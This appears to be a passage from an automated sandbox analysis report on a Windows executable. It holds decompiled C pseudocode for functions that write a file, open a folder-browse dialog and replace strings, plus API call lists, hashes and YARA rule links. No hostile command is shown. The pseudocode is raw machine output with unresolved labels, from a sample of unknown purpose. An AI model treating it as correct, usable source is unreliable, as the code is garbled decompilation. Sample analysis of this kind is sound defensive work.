							E004057F0(_t169, _t223, _t224, _a4, 2, 0x41702e, _t131);
							_push( &_a8);
							E0040E500();
							_t136 = E0040E4C0();
							_t215 = _t214;
							_push(_t136);
							E004057F0(_t169, _t223, _t224, _v20, 1, 0x41702e, E0040E4C0());
							E0040E500( &_v36, _t215);
						}
						__eflags = 0;
						E00405120(0, _a4);
						if(__eflags != 0) {
							break;
						}
						asm("cdq");
						_t189 = _a16 % 2;
						__eflags = _t189;
						if(__eflags != 0) {
							_t82 = E0040E4C0();
							_t193 = _t189;
							_push(_t82);
							_push(_t193);
							_push(E0040E4C0());
							E00405AC0(__eflags, _a4, 1);
							E0040E6C0(2);
							_pop(_t186);
							E00405120(E00405160(_t186), 0x417032);
							if(__eflags == 0) {
								_t88 = E0040E4C0();
								_t196 = 0x417032;
								_push(_t88);
								E00405D40(_v0, 0x417032, E0040E4C0());
								E0040E500( &_v12, _t196);
								_push(_v20);
								_t94 = E0040E4C0();
								_pop(_t199);
								E0040E660(_t199);
								_t52 =  &_a4; // 0x230403c
								E0040E500(_t52, _t94);
								_push(E00405980(_v12));
								_t227 =  *0x4180f0; // 0x2304038
								__eflags = _t227 + _v48 * 0xc;
								_pop(_t99);
								_v0 = _t99;
								_t200 =  *0x4180e8; // 0x22f06f8
								_t100 = E0040E4C0();
								_t201 = _t200;
								E0040E660(_t201);
								_t202 =  *0x4180a8; // 0x22f9788
								E0040E660(_t202);
								_t203 =  *0x4180c4; // 0x22f05f0
								E0040E660(_t203);
								E0040E660(_v48);
								_t189 = 0x417058;
								E0040E660(0x417058);
								E0040E500(0x4180e8, _t100);
							} else {
								_t205 =  *0x4180a8; // 0x22f9788
								_t108 = E0040E4C0();
								_t206 = _t205;
								_push(_t108);
								E0040E660(_t206);
								_t207 =  *0x4180c4; // 0x22f05f0
								E0040E660(_t207);
								_t111 = E0040E4C0();
								_t208 = _t207;
								_push(_t111);
								E00405D40(_v8, 0x417032, E0040E4C0());
								E0040E500( &_a4, _t208);
								E0040ACE5(_v4);
								_t178 =  *0x4180dc; // 0x0
								__eflags = _t178 - 1;
								if(_t178 == 1) {
									_push(E00405980(_a20));
									E0040AD65(_a20);
								}
								_push(_a24);
								E00403BEA();
								_t210 =  *0x4180e8; // 0x22f06f8
								_t120 = E0040E4C0();
								_t211 = _t210;
								E0040E660(_t211);
								E0040E660(_a16);
								_t189 = 0x417058;
								E0040E660(0x417058);
								E0040E500(0x4180e8, _t120);
							}
						} else {
							_t129 = E00405980(_a4);
							_a8 = _t129;
							_v12 =  &(_v12->Internal);
						}
						_t169 = _a12 + 1;
						_a12 = _a12 + 1;
					}
					_t74 = _v8;
				} else {
					_t183 =  *0x4180d4; // 0x0
					if(_t183 != 1) {
						L6:
						_t142 = 0;
						__eflags = 0;
					} else {
						_t183 =  *0x4180c0; // 0x0
						if(_t183 == 1) {
							goto L6;
						} else {
							_t142 = 1;
						}
					}
					_t74 = _t142;
					if(_t142 != 0) {
						_v20 = E00405760( *0x4180e8, 0x417022);
						_v16 = 1;
						while(_v12 >= _v8) {
							_t151 = E0040E4C0();
							_t218 = _t189;
							_push(_t151);
							_t152 = E0040E4C0();
							_t189 = _t218;
							_t3 =  &_v8; // 0x417058
							E004057F0(_t183, _t223, _t224,  *0x4180e8,  *_t3, 0x417058, _t152);
							_push( &_v20);
							E0040E500();
							_t157 = E00402447(_v28);
							_t239 = _t157;
							if(_t157 != 0) {
								_push(_t189);
								_t159 = E0040E4C0();
								E00402BA6(_t239, _v4);
								_t7 =  &_v4; // 0x417058
								E0040E500(_t7, _t159);
								_t8 =  &_v8; // 0x417058
								_push( *_t8);
								_t163 = E0040E4C0();
								_pop(_t221);
								E0040E660(_t221);
								_t9 =  &_v16; // 0x417058
								E0040E660( *_t9);
								_t189 = 0x417058;
								E0040E660(0x417058);
								E0040E500( &_v20, _t163);
							}
							_t11 =  &_v8;
							 *_t11 = _v8 + 1;
							if( *_t11 >= 0) {
								continue;
							}
							break;
						}
						_a4 = E00405700(_a4);
						WriteFile( *0x418094, _v0, E0040A180(_a4),  &_a8, 0);
						E0040A1A0(_v0);
						_t74 = E00405068(0x4180e8, 0x417020);
					}
				}
				return E0040E590(E0040E590(E0040E590(E0040E590(E0040E590(_t74, _v4), _a24), _v4), _a12), _v16);
			}





























































                                        0x00401511
                                        0x00401511
                                        0x00401513
                                        0x00401518
                                        0x00401518
                                        0x0040151b
                                        0x00401522
                                        0x00401522
                                        0x00401525
                                        0x0040152a
                                        0x00401533
                                        0x0040166b
                                        0x00401675
                                        0x0040167d
                                        0x0040167e
                                        0x00401683
                                        0x00401684
                                        0x00401686
                                        0x0040168b
                                        0x0040169d
                                        0x004016a6
                                        0x004016a7
                                        0x004016bb
                                        0x004016bf
                                        0x004016c4
                                        0x004016c7
                                        0x004016cc
                                        0x004016cd
                                        0x004016cf
                                        0x004016d4
                                        0x004016e5
                                        0x004016ee
                                        0x004016ef
                                        0x004016f5
                                        0x004016fa
                                        0x004016fb
                                        0x00401713
                                        0x0040171d
                                        0x0040171d
                                        0x00401726
                                        0x00401728
                                        0x0040172d
                                        0x00000000
                                        0x00000000
                                        0x0040173e
                                        0x0040173f
                                        0x00401743
                                        0x00401745
                                        0x00401773
                                        0x00401778
                                        0x00401779
                                        0x0040177a
                                        0x00401781
                                        0x0040178b
                                        0x00401790
                                        0x0040179a
                                        0x004017a3
                                        0x004017a8
                                        0x00401863
                                        0x00401868
                                        0x00401869
                                        0x0040187c
                                        0x00401886
                                        0x0040188f
                                        0x00401890
                                        0x00401895
                                        0x00401898
                                        0x004018ac
                                        0x004018b0
                                        0x004018be
                                        0x004018c3
                                        0x004018cc
                                        0x004018ce
                                        0x004018cf
                                        0x004018d2
                                        0x004018d9
                                        0x004018de
                                        0x004018e1
                                        0x004018e6
                                        0x004018ed
                                        0x004018f2
                                        0x004018f9
                                        0x00401903
                                        0x00401908
                                        0x0040190e
                                        0x0040191a
                                        0x004017ae
                                        0x004017ae
                                        0x004017b5
                                        0x004017ba
                                        0x004017bb
                                        0x004017bd
                                        0x004017c2
                                        0x004017c9
                                        0x004017cf
                                        0x004017d4
                                        0x004017d5
                                        0x004017e8
                                        0x004017f3
                                        0x004017fc
                                        0x00401801
                                        0x00401807
                                        0x0040180a
                                        0x00401815
                                        0x0040181a
                                        0x0040181a
                                        0x0040181f
                                        0x00401823
                                        0x00401828
                                        0x0040182f
                                        0x00401834
                                        0x00401837
                                        0x00401841
                                        0x00401846
                                        0x0040184c
                                        0x00401858
                                        0x00401858
                                        0x00401747
                                        0x00401760
                                        0x00401761
                                        0x00401769
                                        0x00401769
                                        0x00401927
                                        0x00401928
                                        0x00401928
                                        0x00401931
                                        0x00401539
                                        0x00401539
                                        0x00401542
                                        0x00401556
                                        0x00401556
                                        0x00401556
                                        0x00401544
                                        0x00401544
                                        0x0040154d
                                        0x00000000
                                        0x0040154f
                                        0x0040154f
                                        0x0040154f
                                        0x0040154d
                                        0x00401558
                                        0x0040155a
                                        0x00401571
                                        0x00401574
                                        0x0040157e
                                        0x0040158c
                                        0x00401591
                                        0x00401592
                                        0x00401594
                                        0x00401599
                                        0x004015a1
                                        0x004015ab
                                        0x004015b4
                                        0x004015b5
                                        0x004015be
                                        0x004015c3
                                        0x004015c5
                                        0x004015c7
                                        0x004015c8
                                        0x004015d3
                                        0x004015d8
                                        0x004015dd
                                        0x004015e2
                                        0x004015e6
                                        0x004015e7
                                        0x004015ec
                                        0x004015ef
                                        0x004015f4
                                        0x004015f9
                                        0x004015fe
                                        0x00401604
                                        0x0040160e
                                        0x0040160e
                                        0x00401613
                                        0x00401613
                                        0x00401617
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00401617
                                        0x00401626
                                        0x00401648
                                        0x00401651
                                        0x00401661
                                        0x00401661
                                        0x00401666
                                        0x0040196b

                                        APIs
                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401648
                                          • Part of subcall function 0040E4C0: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E4C6
                                          • Part of subcall function 0040E4C0: TlsGetValue.KERNEL32(0000001B), ref: 0040E4D5
                                          • Part of subcall function 0040E4C0: SetLastError.KERNEL32(?), ref: 0040E4EB
                                          • Part of subcall function 004057F0: _wcsncoll.MSVCRT ref: 00405853
                                          • Part of subcall function 004057F0: memmove.MSVCRT ref: 004058E1
                                          • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                                          • Part of subcall function 0040E500: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                          • Part of subcall function 0040E500: RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                          • Part of subcall function 00405920: wcsstr.MSVCRT ref: 00405961
                                          • Part of subcall function 0040E500: RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E55C
                                          • Part of subcall function 0040ACE5: wcsncpy.MSVCRT ref: 0040AD03
                                          • Part of subcall function 0040ACE5: wcslen.MSVCRT ref: 0040AD15
                                          • Part of subcall function 0040ACE5: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040AD55
                                          • Part of subcall function 0040E660: wcslen.MSVCRT ref: 0040E677
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWrite_wcsncollmemmovewcsstr
                                        • String ID: pA$"pA$*pA$.pA$.pA$.pA$2pA$2pA$2pA$XpA$XpA$XpA$XpA$XpA
                                        • API String ID: 2893953147-1555911095
                                        • Opcode ID: 30cb0d6d68ba4c3e4247a535a18f74cefe63111f1db9d44fe7866930485b7dfc
                                        • Instruction ID: af5d29b42703b917e143a90367de22410d0b9fbc5f868d92959c7df138d2f405
                                        • Opcode Fuzzy Hash: 30cb0d6d68ba4c3e4247a535a18f74cefe63111f1db9d44fe7866930485b7dfc
                                        • Instruction Fuzzy Hash: ACB15AB1114304AED600BF62DC86E6F77ADEB88708F50CD3FB144A61A2DA3DCD559A2D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004092F5, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 70%
                                        			E004092F5(void* __esi, intOrPtr _a4, wchar_t* _a8, intOrPtr _a12) {
				short _v2;
				long _v520;
				wchar_t* _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				void _v552;
				_Unknown_base(*)()* _v556;
				_Unknown_base(*)()* _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				short* _t39;
				_Unknown_base(*)()* _t42;
				signed int _t47;
				wchar_t* _t56;
				int _t60;
				short _t61;
				wchar_t* _t67;
				int _t68;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t72;
				wchar_t* _t74;
				struct HINSTANCE__* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_t70 = __esi;
				_t76 =  &_v560;
				_t68 = 0;
				_t79 =  *0x418140 - _t68; // 0x0
				if(_t79 == 0) {
					 *0x418140 = 1;
					 *0x417688(0);
				}
				memset( &_v552, _t68, 0x20);
				_t77 = _t76 + 0xc;
				_t75 = LoadLibraryW(L"SHELL32.DLL");
				if(_t75 == 0) {
					L12:
					_t39 = E0040E8A0(0x104, _a12);
					_t66 = 0;
					 *_t39 = 0;
					goto L13;
				} else {
					_push(_t70);
					_v560 = GetProcAddress(_t75, "SHBrowseForFolderW");
					_t42 = GetProcAddress(_t75, "SHGetPathFromIDListW");
					_t67 = _a8;
					_v556 = _t42;
					if(_t67 == 0) {
						_t67 = 0x413024;
					}
					wcsncpy( &_v520, _t67, 0x103);
					_v2 = 0;
					_t47 = wcslen( &_v520);
					_t78 = _t77 + 0x10;
					_t66 = 0x5c;
					if(_t47 > 3 &&  *((intOrPtr*)(_t78 + 0x36 + _t47 * 2)) == _t66) {
						_t66 = 0;
						 *((short*)(_t78 + 0x36 + _t47 * 2)) = 0;
					}
					_v540 = _a4;
					_v552 = E00409471(_t66);
					_v536 = 0x50;
					_v532 = E004092B1;
					_v528 =  &_v520;
					E00409528(1);
					_t72 = _v564( &_v556);
					_v568 = _t72;
					E00409528(_t68);
					if(_t72 != 0) {
						_t56 = E0040E8A0(0x104, _a8);
						_t69 = _v572;
						_t74 = _t56;
						 *_t74 = 0;
						_v568(_t69, _t74);
						 *0x41768c();
						_t60 = wcslen(_t74);
						_t66 = _t69;
						_t68 = _t60;
						_t61 = 0x5c;
						if( *((intOrPtr*)(_t74 + _t68 * 2 - 2)) != _t61) {
							 *((short*)(_t74 + _t68 * 2)) = _t61;
							 *((short*)(_t74 + 2 + _t68 * 2)) = 0;
							_t68 = _t68 + 1;
						}
					}
					FreeLibrary(_t75);
					if(_t68 != 0) {
						L13:
						return E0040E9F0(_t66, 0x104 - _t68);
					} else {
						goto L12;
					}
				}
			}
































                                        0x004092f5
                                        0x004092f5
                                        0x004092fe
                                        0x00409300
                                        0x00409306
                                        0x00409309
                                        0x00409313
                                        0x00409313
                                        0x00409321
                                        0x00409326
                                        0x00409334
                                        0x0040933d
                                        0x0040944b
                                        0x00409453
                                        0x00409458
                                        0x0040945a
                                        0x00000000
                                        0x00409343
                                        0x00409343
                                        0x00409358
                                        0x0040935c
                                        0x0040935e
                                        0x00409365
                                        0x0040936b
                                        0x0040936d
                                        0x0040936d
                                        0x0040937d
                                        0x00409384
                                        0x00409391
                                        0x00409396
                                        0x0040939b
                                        0x0040939f
                                        0x004093a8
                                        0x004093aa
                                        0x004093aa
                                        0x004093b6
                                        0x004093bf
                                        0x004093c9
                                        0x004093d1
                                        0x004093d9
                                        0x004093dd
                                        0x004093eb
                                        0x004093ee
                                        0x004093f2
                                        0x004093f9
                                        0x00409403
                                        0x00409408
                                        0x0040940c
                                        0x00409412
                                        0x00409415
                                        0x0040941a
                                        0x00409421
                                        0x00409426
                                        0x00409427
                                        0x0040942b
                                        0x00409431
                                        0x00409433
                                        0x00409439
                                        0x0040943e
                                        0x0040943e
                                        0x00409431
                                        0x00409440
                                        0x00409449
                                        0x0040945d
                                        0x0040946e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00409449

                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00409313
                                          • Part of subcall function 0040E9F0: TlsGetValue.KERNEL32(0000001B,\\?\,?,0040968D,00000104,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E9FA
                                        • memset.MSVCRT ref: 00409321
                                        • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040932E
                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00409350
                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 0040935C
                                        • wcsncpy.MSVCRT ref: 0040937D
                                        • wcslen.MSVCRT ref: 00409391
                                        • 73E3A680.OLE32(?), ref: 0040941A
                                        • wcslen.MSVCRT ref: 00409421
                                        • FreeLibrary.KERNEL32(00000000,00000000), ref: 00409440
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AddressLibraryProcwcslen$A680FreeInitializeLoadValuememsetwcsncpy
                                        • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                        • API String ID: 2437570557-92458654
                                        • Opcode ID: e00b0364f3b7a9fc8518e37f1732af8c017c9f5cb5ecd2789d9505500759c020
                                        • Instruction ID: 709901673888fa08a5be44f816414f57ae9b1cc2482300a7476a011af7fafeef
                                        • Opcode Fuzzy Hash: e00b0364f3b7a9fc8518e37f1732af8c017c9f5cb5ecd2789d9505500759c020
                                        • Instruction Fuzzy Hash: 84416571508300ABD720AF759C45A9FBBE8EF88704F00483FF945E3292DB7899458B5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004062B0, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 89%
                                        			E004062B0() {
				signed int _t88;
				long _t89;
				signed int _t91;
				wchar_t* _t92;
				wchar_t* _t93;
				wchar_t* _t94;
				signed short* _t98;
				signed short _t99;
				int _t101;
				void* _t103;
				signed int _t105;
				wchar_t* _t106;
				void* _t107;
				wchar_t* _t109;
				signed int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				signed int _t116;
				wchar_t* _t117;
				signed short* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed short* _t122;
				signed short* _t123;
				signed int _t126;
				signed short* _t127;
				signed char _t128;
				signed short* _t131;
				signed int _t132;
				long* _t134;
				wchar_t* _t135;
				wchar_t* _t141;
				void* _t142;
				signed short* _t143;
				wchar_t* _t146;
				wchar_t* _t147;
				signed int _t149;
				signed int _t150;
				void* _t151;

				_t150 = 0;
				if( *(_t151 + 0x34) == 0) {
					 *(_t151 + 0x34) = 0x413024;
				}
				_t117 =  *(_t151 + 0x38);
				if(_t117 == 0) {
					_t117 = 0x413024;
					 *(_t151 + 0x38) = 0x413024;
				}
				if( *(_t151 + 0x3c) == _t150) {
					 *(_t151 + 0x3c) = 0x413024;
				}
				_t128 =  *(_t151 + 0x40);
				_t120 = 0x40530d;
				_t88 = _t128 & 0x00000001;
				 *(_t151 + 0x14) = _t88;
				if(_t88 == 0) {
					_t120 = L004052F5;
				}
				 *(_t151 + 0x40) = _t120;
				if( *(_t151 + 0x44) <= _t150) {
					 *(_t151 + 0x44) = 1;
				}
				_t147 = _t117;
				_t134 =  &(_t147[0]);
				do {
					_t89 =  *_t147;
					_t147 =  &(_t147[0]);
				} while (_t89 != 0);
				_t135 =  *(_t151 + 0x3c);
				_t149 = _t147 - _t134 >> 1;
				 *(_t151 + 0x10) =  &(_t135[0]);
				do {
					_t91 =  *_t135;
					_t135 =  &(_t135[0]);
				} while (_t91 != 0);
				_t137 = _t135 -  *(_t151 + 0x10) >> 1;
				 *(_t151 + 0x10) = _t135 -  *(_t151 + 0x10) >> 1;
				if((_t128 & 0x00000002) == 0) {
					_t92 = E0040E820(_t120,  *(_t151 + 0x34));
					 *(_t151 + 0x24) = _t92;
					if(_t92 != 0) {
						_push( *(_t151 + 0x34));
						L00405313();
						_t151 = _t151 + 4;
						 *(_t151 + 0x34) = _t92;
					}
					_t93 = E0040E820(_t120, _t117);
					 *(_t151 + 0x28) = _t93;
					if(_t93 != 0) {
						_push(_t117);
						L00405313();
						_t117 = _t93;
						_t151 = _t151 + 4;
						 *(_t151 + 0x38) = _t117;
					}
					_t94 = E0040E820(_t120,  *(_t151 + 0x3c));
					 *(_t151 + 0x2c) = _t94;
					if(_t94 != 0) {
						_push( *(_t151 + 0x3c));
						L00405313();
						_t151 = _t151 + 4;
						 *(_t151 + 0x3c) = _t94;
					}
					_t121 =  *(_t151 + 0x44) +  *(_t151 + 0x44);
					 *(_t151 + 0x1c) = _t121;
					_t98 =  &(( *(_t151 + 0x34))[0]) + _t121;
					 *(_t151 + 0x20) = _t98;
					_t122 = _t98;
					 *(_t151 + 0x18) = _t122;
					if( *(_t151 + 0x48) != 0) {
						_t111 =  *_t122 & 0x0000ffff;
						if(_t111 != 0) {
							_t143 = _t122;
							do {
								if( *(_t151 + 0x14) != 0) {
									_t112 =  *((intOrPtr*)(_t151 + 0x4c))(_t143, _t117, _t149);
									_t151 = _t151 + 0xc;
									if(_t112 != 0) {
										goto L38;
									} else {
										goto L48;
									}
									goto L61;
								} else {
									if(_t111 !=  *_t117) {
										L38:
										_t143 =  &(_t143[1]);
										goto L39;
									} else {
										_t113 =  *((intOrPtr*)(_t151 + 0x4c))(_t143, _t117, _t149);
										_t151 = _t151 + 0xc;
										if(_t113 == 0) {
											L48:
											_t132 =  *(_t151 + 0x48);
											_t143 =  &(_t143[_t149]);
											_t150 = _t150 + 1;
											if(_t132 == 0xffffffff) {
												goto L39;
											} else {
												if(_t132 <= _t150) {
													break;
												} else {
													goto L39;
												}
											}
											L61:
											if( *(_t151 + 0x24) != 0) {
												_push(_t118);
												L00405319();
												_t151 = _t151 + 4;
											}
											if( *(_t151 + 0x28) != 0) {
												_push( *(_t151 + 0x38));
												L00405319();
												_t151 = _t151 + 4;
											}
											if( *(_t151 + 0x2c) != 0) {
												_push( *(_t151 + 0x3c));
												L00405319();
												return _t91;
											}
											goto L67;
										} else {
											goto L38;
										}
									}
								}
								break;
								L39:
								_t111 =  *_t143 & 0x0000ffff;
							} while (_t111 != 0);
							_t137 =  *(_t151 + 0x10);
						}
					}
					_t118 =  *(_t151 + 0x34);
					_t123 = _t118;
					_t131 =  &(_t123[1]);
					do {
						_t99 =  *_t123;
						_t123 =  &(_t123[1]);
					} while (_t99 != 0);
					_t141 = E0040E8A0((_t137 - _t149) * _t150 + (_t123 - _t131 >> 1),  *((intOrPtr*)(_t151 + 0x4c)));
					if(_t150 != 0) {
						_t101 =  *(_t151 + 0x44);
						if(_t101 > 1) {
							wcsncpy(_t141,  *(_t151 + 0x38), _t101);
							_t109 =  *(_t151 + 0x28);
							_t151 = _t151 + 0xc;
							_t118 =  *(_t151 + 0x20);
							_t141 = _t141 +  &(_t109[0]);
						}
						_t126 =  *_t118 & 0x0000ffff;
						while(_t126 != 0) {
							if(_t150 <= 0) {
								L58:
								 *_t141 =  *_t118;
								_t141 =  &(_t141[0]);
								_t118 =  &(_t118[1]);
							} else {
								if( *(_t151 + 0x14) != 0) {
									_t103 =  *((intOrPtr*)(_t151 + 0x4c))(_t118,  *(_t151 + 0x3c), _t149);
									_t151 = _t151 + 0xc;
									if(_t103 != 0) {
										goto L58;
									} else {
										goto L69;
									}
									goto L70;
								} else {
									_t106 =  *(_t151 + 0x38);
									if(_t126 !=  *_t106) {
										goto L58;
									} else {
										_t107 =  *((intOrPtr*)(_t151 + 0x4c))(_t118, _t106, _t149);
										_t151 = _t151 + 0xc;
										if(_t107 == 0) {
											L69:
											wcsncpy(_t141,  *(_t151 + 0x40),  *(_t151 + 0x10));
											_t105 =  *(_t151 + 0x1c);
											_t118 =  &(_t118[_t149]);
											_t151 = _t151 + 0xc;
											_t150 = _t150 - 1;
											_t141 = _t141 + _t105 * 2;
										} else {
											goto L58;
										}
									}
								}
							}
							_t126 =  *_t118 & 0x0000ffff;
						}
						_t118 =  *(_t151 + 0x34);
						_t91 = 0;
						 *_t141 = 0;
					} else {
						_t127 = _t118;
						_t142 = _t141 - _t118;
						do {
							_t91 =  *_t127 & 0x0000ffff;
							_t127 =  &(_t127[1]);
							 *(_t142 + _t127 - 2) = _t91;
						} while (_t91 != 0);
					}
					goto L61;
				} else {
					if(_t149 == 0) {
						L67:
						return _t91;
					} else {
						_t91 =  *(_t151 + 0x48);
						if(_t91 != 0) {
							_t146 =  *(_t151 + 0x34) + ( *(_t151 + 0x44) - 1) * 2;
							_t119 = _t146;
							if( *_t119 != _t150) {
								while(_t91 == 0xffffffff || _t91 > _t150) {
									_t114 =  *_t120(_t146,  *(_t151 + 0x3c), _t149);
									_t151 = _t151 + 0xc;
									if(_t114 != 0) {
										_t146 =  &(_t146[0]);
										_t119 =  &(_t119[0]);
									} else {
										wcsncpy(_t146,  *(_t151 + 0x40),  *(_t151 + 0x10));
										_t116 =  *(_t151 + 0x1c);
										_t119 = _t119 + _t149 * 2;
										_t151 = _t151 + 0xc;
										_t150 = _t150 + 1;
										_t146 = _t146 + _t116 * 2;
									}
									_t91 =  *(_t151 + 0x48);
									_t120 =  *(_t151 + 0x40);
									if( *_t119 != 0) {
										continue;
									} else {
										return _t91;
									}
									goto L70;
								}
							}
						}
						goto L67;
					}
				}
				L70:
			}












































                                        0x004062b5
                                        0x004062bd
                                        0x004062bf
                                        0x004062bf
                                        0x004062c7
                                        0x004062cd
                                        0x004062cf
                                        0x004062d4
                                        0x004062d4
                                        0x004062dc
                                        0x004062de
                                        0x004062de
                                        0x004062e6
                                        0x004062ea
                                        0x004062f1
                                        0x004062f4
                                        0x004062f8
                                        0x004062fa
                                        0x004062fa
                                        0x004062ff
                                        0x00406307
                                        0x00406309
                                        0x00406309
                                        0x00406311
                                        0x00406313
                                        0x00406316
                                        0x00406316
                                        0x00406319
                                        0x0040631c
                                        0x00406323
                                        0x00406327
                                        0x0040632c
                                        0x00406330
                                        0x00406330
                                        0x00406333
                                        0x00406336
                                        0x0040633f
                                        0x00406341
                                        0x00406348
                                        0x004063dd
                                        0x004063e2
                                        0x004063e8
                                        0x004063ea
                                        0x004063ee
                                        0x004063f3
                                        0x004063f6
                                        0x004063f6
                                        0x004063fb
                                        0x00406400
                                        0x00406406
                                        0x00406408
                                        0x00406409
                                        0x0040640e
                                        0x00406410
                                        0x00406413
                                        0x00406413
                                        0x0040641b
                                        0x00406420
                                        0x00406426
                                        0x00406428
                                        0x0040642c
                                        0x00406431
                                        0x00406434
                                        0x00406434
                                        0x00406440
                                        0x0040644a
                                        0x0040644e
                                        0x00406450
                                        0x00406454
                                        0x00406456
                                        0x0040645c
                                        0x0040645e
                                        0x00406464
                                        0x00406466
                                        0x00406468
                                        0x0040646d
                                        0x004064e8
                                        0x004064ec
                                        0x004064f1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040646f
                                        0x00406472
                                        0x00406482
                                        0x00406482
                                        0x00000000
                                        0x00406474
                                        0x00406477
                                        0x0040647b
                                        0x00406480
                                        0x004064f3
                                        0x004064f3
                                        0x004064f7
                                        0x004064fa
                                        0x004064fe
                                        0x00000000
                                        0x00406500
                                        0x00406502
                                        0x00000000
                                        0x00406504
                                        0x00000000
                                        0x00406504
                                        0x00406502
                                        0x00406574
                                        0x00406579
                                        0x0040657b
                                        0x0040657c
                                        0x00406581
                                        0x00406581
                                        0x00406589
                                        0x0040658b
                                        0x0040658f
                                        0x00406594
                                        0x00406594
                                        0x0040659c
                                        0x0040659e
                                        0x004065a2
                                        0x00000000
                                        0x004065a7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406480
                                        0x00406472
                                        0x00000000
                                        0x00406485
                                        0x00406485
                                        0x00406488
                                        0x0040648d
                                        0x0040648d
                                        0x00406464
                                        0x00406491
                                        0x00406495
                                        0x00406497
                                        0x004064a0
                                        0x004064a0
                                        0x004064a3
                                        0x004064a6
                                        0x004064c0
                                        0x004064c4
                                        0x00406509
                                        0x00406510
                                        0x00406518
                                        0x0040651d
                                        0x00406521
                                        0x00406524
                                        0x0040652b
                                        0x0040652b
                                        0x0040652d
                                        0x00406533
                                        0x00406537
                                        0x00406557
                                        0x0040655a
                                        0x0040655d
                                        0x00406560
                                        0x00406539
                                        0x0040653e
                                        0x004065ba
                                        0x004065be
                                        0x004065c3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406540
                                        0x00406540
                                        0x00406547
                                        0x00000000
                                        0x00406549
                                        0x0040654c
                                        0x00406550
                                        0x00406555
                                        0x004065c5
                                        0x004065ce
                                        0x004065d3
                                        0x004065d7
                                        0x004065da
                                        0x004065dd
                                        0x004065de
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406555
                                        0x00406547
                                        0x0040653e
                                        0x00406563
                                        0x00406566
                                        0x0040656b
                                        0x0040656f
                                        0x00406571
                                        0x004064c6
                                        0x004064c6
                                        0x004064c8
                                        0x004064d0
                                        0x004064d0
                                        0x004064d3
                                        0x004064d6
                                        0x004064db
                                        0x004064e0
                                        0x00000000
                                        0x0040634e
                                        0x00406350
                                        0x004065b1
                                        0x004065b1
                                        0x00406356
                                        0x00406356
                                        0x0040635c
                                        0x0040636b
                                        0x0040636e
                                        0x00406373
                                        0x00406380
                                        0x00406393
                                        0x00406395
                                        0x0040639a
                                        0x004063ba
                                        0x004063bd
                                        0x0040639c
                                        0x004063a5
                                        0x004063aa
                                        0x004063ae
                                        0x004063b1
                                        0x004063b4
                                        0x004063b5
                                        0x004063b5
                                        0x004063c4
                                        0x004063c8
                                        0x004063cc
                                        0x00000000
                                        0x004063d5
                                        0x004063d5
                                        0x004063d5
                                        0x00000000
                                        0x004063cc
                                        0x00406380
                                        0x00406373
                                        0x00000000
                                        0x0040635c
                                        0x00406350
                                        0x00000000

                                        APIs
                                        • wcsncpy.MSVCRT ref: 004063A5
                                          • Part of subcall function 0040E820: TlsGetValue.KERNEL32(0000001B,?,?,00405E65,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E82A
                                        • _wcsdup.MSVCRT ref: 004063EE
                                        • _wcsdup.MSVCRT ref: 00406409
                                        • _wcsdup.MSVCRT ref: 0040642C
